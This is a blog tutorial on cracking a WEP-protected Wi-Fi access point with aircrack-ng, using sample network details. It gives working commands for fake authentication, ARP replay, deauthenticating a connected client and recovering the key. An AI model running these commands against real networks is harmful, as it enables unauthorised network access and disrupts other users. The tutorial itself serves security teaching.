This post will build off of the Attacking Wifi Series - Overview & Commands post. We will look at how to use different Wifi attack commands to crack the key of a WEP AP with at least 1 connected client.
Most technically savvy individuals know that WEP encryption is a serious no-no, though for various compatibility reasons, many corporate environments are still using WEP encryption in their wireless networks.
For this scenario, we will be using the information below to illustrate how to conduct the attack and attain the WEP key.
- BSSID: 34:08:04:09:3D:38
- AP Channel: 3
- ESSID: hitme (Open Authentication)
- Client: 00:18:4D:1D:A8:1F
- mon0: 00:1F:33:F3:51:13
Initial Attack Setup
The first step in every attack scenario is to place the wireless interface in monitor mode on the same channel as the access point.
root@attacker:~# airmon-ng start wlan0 3
This will set wlan0 into monitor mode as mon0 on channel 3
Now, an Airodump sniffing session needs to be started and write the capture file to the disk for usage by Aircrack-ng for breaking the WEP key
root@attacker:~# airodump-ng -c 3 –bssid 34:08:04:09:3D:38 -w wep1 mon0
This will start airodump-ng, listening on Channel 3 and filtering on the BSSID and saving the output to wep1
Now, we conduct a fake authentication attack against the AP
root@attacker:~# aireplay-ng -1 0 -e hitme -a 34:08:04:09:3D:38 -h 00:1F:33:F3:51:13 mon0
This allows us to associate with the access point.
Generating Weak IVs
Now we can launch the ARP Request Replay Attack
root@attacker:~# aireplay-ng -3 -b 34:08:04:09:3D:38 -h 00:1F:33:F3:51:13 mon0
You may have to wait a bit until an ARP request shows up on the network, this will depend on the amount of traffic on the network. You will see the Data field in the airodump session rapidly increasing as the weak IVs are being captured.
To help with this, we can use the Deauthentication Attack
root@attacker:~# aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F mon0
This will deauthenticate the client from the AP, forcing the client to send ARP packets to the AP as it reconnects, which we will need to replay to help force the AP to generate a large number of weak IVs.
Cracking the WEP Key
Once we have captured a substantial number of weak IVs, 250,000 for 64-bit keys and 1.5 million for 128-bit keys, we can now use aircrack-ng to crack the key. For this we have 2 options.
The first method, is the default IV-based cracking method.
root@attacker:~# aircrack-ng wep1.pcap
The other option, which typically is a faster option, is the PTW Crack method. It should be noted, this method only works with ARP request/reply packets.
root@attacker:~# aircrack-ng -z wep1.pcap
The result of either of these commands should result in the WEP Key